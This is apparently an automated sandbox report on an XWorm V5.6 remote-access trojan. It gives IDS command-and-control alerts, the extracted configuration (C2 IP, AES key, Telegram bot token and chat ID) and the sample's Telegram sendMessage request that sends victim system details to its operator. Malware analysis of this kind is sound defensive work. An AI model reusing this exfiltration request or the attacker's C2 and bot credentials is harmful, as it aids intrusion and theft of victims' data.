2024-12-05T19:41:44.189182+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:44.357039+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:49.932460+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:50.504394+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:50.627833+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:50.797977+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:50.917747+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:56.186173+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:56.331341+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:56.501294+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:08.887117+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:12.119563+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:22.728656+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:22.871805+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:23.043784+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:23.186431+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:26.604303+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:28.025141+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:33.682516+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:38.229933+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:38.420604+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:43.704189+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:44.119844+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:46.375024+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:58.890884+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:04.246700+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:04.438814+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:05.042164+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:14.276672+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:14.417228+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:14.596237+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:14.839916+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:22.324503+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:24.698239+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:29.693242+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:29.883678+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:40.201444+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:41.341754+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:42.026533+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:54.547027+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:56.828046+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:57.108010+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:44:08.659555+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T19:41:06.078519+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:36.074500+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:06.073461+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:36.096593+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:06.096583+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:36.090598+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:44:06.093314+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
                            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                            2024-12-05T19:41:55.895664+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP

                            AV Detection

                            Source: file.exe | Avira: detected
                            Source: 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["185.196.8.239"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "8070077125:AAEdRIyp1anHye9Y0jcV8uNF6U4mmijN8Pk", "Telegram Chatid": "1818813749", "Version": "XWorm V5.6"}
                            Source: C:\Users\user\AppData\Roaming\file.exe | ReversingLabs: Detection: 47%
                            Source: C:\Users\user\WindowsUpdaterConf.exe | ReversingLabs: Detection: 47%
                            Source: file.exe | ReversingLabs: Detection: 47%
                            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                            Source: file.exe | Joe Sandbox ML: detected
                            Source: 1.2.file.exe.400000.0.unpack | String decryptor: 185.196.8.239
                            Source: 1.2.file.exe.400000.0.unpack | String decryptor: 7000
                            Source: 1.2.file.exe.400000.0.unpack | String decryptor: <123456789>
                            Source: 1.2.file.exe.400000.0.unpack | String decryptor: <Xwormmm>
                            Source: 1.2.file.exe.400000.0.unpack | String decryptor: XWorm V5.6
                            Source: 1.2.file.exe.400000.0.unpack | String decryptor: USB.exe
                            Source: 1.2.file.exe.400000.0.unpack | String decryptor: %Userprofile%
                            Source: 1.2.file.exe.400000.0.unpack | String decryptor: WindowsUpdaterConf.exe
                            Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
                            Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: mscorlib.pdba | source: WER3CD5.tmp.dmp.42.dr
                            Source: Binary string: System.Management.pdbTz | source: WERB32D.tmp.dmp.19.dr
                            Source: Binary string: System.pdbMZ@ | source: WER5266.tmp.dmp.39.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: mscorlib.pdb | source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: mscorlib.pdbSystem.Management.ni.dll | source: WERB32D.tmp.dmp.19.dr
                            Source: Binary string: System.ni.pdbRSDS | source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.ni.pdbRSDSJ< | source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.pdb | source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.pdbL0 | source: WER5266.tmp.dmp.39.dr
                            Source: Binary string: mscorlib.ni.pdb | source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.ni.pdb | source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: mscorlib.ni.pdbRSDS | source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.ni.pdb | source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.pdb | source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr

                            Networking

                            Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49742 -> 185.196.8.239:7000
                            Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.196.8.239:7000 -> 192.168.2.4:49742
                            Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49742 -> 185.196.8.239:7000
                            Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 185.196.8.239:7000 -> 192.168.2.4:49742
                            Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49742 -> 185.196.8.239:7000
                            Source: Network traffic | Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49740 -> 149.154.167.220:443
                            Source: Malware configuration extractor | URLs: 185.196.8.239
                            Source: unknown | DNS query: name: api.telegram.org
                            Source: Yara match | File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPE
                            Source: global traffic | TCP traffic: 192.168.2.4:49742 -> 185.196.8.239:7000
                            Source: global traffic | HTTP traffic detected: GET /bot8070077125:AAEdRIyp1anHye9Y0jcV8uNF6U4mmijN8Pk/sendMessage?chat_id=1818813749&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20YD8OYZ2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                            Source: Joe Sandbox View | IP Address: 185.196.8.239
                            Source: Joe Sandbox View | IP Address: 208.95.112.1
                            Source: Joe Sandbox View | ASN Name: SIMPLECARRER2IT
                            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknown | DNS query: name: ip-api.com
                            Source: unknown | TCP traffic detected without corresponding DNS query: 185.196.8.239 (this entry is repeated 50 times in the report, once per connection attempt)
                            Source: global traffic | HTTP traffic detected: GET /bot8070077125:AAEdRIyp1anHye9Y0jcV8uNF6U4mmijN8Pk/sendMessage?chat_id=1818813749&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20YD8OYZ2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                            Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                            Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                            Source: powershell.exe, 00000006.00000002.1816364705.00000000074A9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1875270222.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1875270222.00000000087C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
                            Source: powershell.exe, 0000000C.00000002.1964621290.0000000007F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft/
                            Source: file.exe, 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: powershell.exe, 00000006.00000002.1809974233.0000000005958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1866493773.0000000005DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1941064108.0000000005688000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000006.00000002.1803745466.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: file.exe, 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1803745466.00000000048F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.0000000004691000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000006.00000002.1803745466.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: Amcache.hve.29.dr | String found in binary or memory: http://upx.sf.net
                            Source: powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000009.00000002.1875270222.00000000087C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.(
                            Source: powershell.exe, 00000006.00000002.1802768273.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
                            Source: powershell.exe, 00000006.00000002.1803745466.00000000048F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.0000000004691000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBfq
                            Source: file.exe, 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                            Source: powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000006.00000002.1809974233.0000000005958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1866493773.0000000005DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1941064108.0000000005688000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
                            Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
                            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2

                            Operating System Destruction

                            Source: C:\Users\user\Desktop\file.exe | Process information set: 01 00 00 00

                            System Summary

                            Source: 0.2.file.exe.3719ccc.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.file.exe.372e50c.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_031C8D58
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_031CEF90
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_031CD3E8
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_031C0C70
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_031C0C60
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_061C4720
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_061C1BB8
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_061C2488
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_061C4710
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_061C1870
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06288C18
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06287D68
                            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0628F400
                            Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011CE170
                            Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C9728
                            Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C4758
                            Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011CD628
                            Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C1978
                            Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C4D70
                            Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C8E58
                            Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C8B10
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_0485B490
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_04C6B490
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_08C53E98
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00A6B490
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 14_2_032F0FAA
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 14_2_032FEF90
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 14_2_032FD3E8
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 14_2_032F0C60
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 14_2_032F0C70
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 14_2_06411BB8
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 14_2_06412488
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 14_2_06411870
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 14_2_064D8C18
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 14_2_064DF400
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00BBB498
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00BBB488
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_081D3AA8
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 22_2_00D78D58
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 22_2_00D70C70
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 22_2_00D70C60
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 22_2_00D7198A
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 22_2_00D7D3E8
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 22_2_00D7EF90
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 22_2_00D70FAA
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 22_2_05682488
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 22_2_05681BB8
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 22_2_05681870
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 22_2_05748C18
                            Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 22_2_0574F400
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 27_2_00EED3E8
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 27_2_00EE0C70
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 27_2_00EE0FAA
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 27_2_00EEEF90
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 27_2_058D2488
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 27_2_058D1BB8
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 27_2_058D1870
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 27_2_05998C18
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 27_2_0599F400
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 30_2_01728D58
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 30_2_0172198A
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 30_2_01720C70
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 30_2_01720C60
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 30_2_0172D3E8
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 30_2_0172EF90
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 30_2_060D1BB8
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 30_2_060D2488
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 30_2_060D1870
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 30_2_06198C18
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 30_2_0619F400
